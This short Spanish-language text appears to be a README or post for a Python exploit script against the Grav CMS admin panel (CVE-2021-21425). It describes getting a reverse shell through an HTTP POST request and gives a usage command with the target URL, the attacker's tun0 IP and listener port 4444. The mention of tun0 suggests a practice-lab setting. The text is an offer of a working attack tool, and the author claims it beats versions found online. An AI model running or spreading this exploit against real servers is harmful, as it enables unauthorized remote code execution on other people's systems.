
Script de exploit en Python para CVE-2021-21425 dirigido al panel de administración de Grav CMS, que entrega una reverse shell mediante una petición HTTP POST con LHOST y LPORT configurables.
esta es mi versión, encontré muchas en internet pero son demasiado malas
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
espera... en 60 segundos obtendrás una shell en tu listener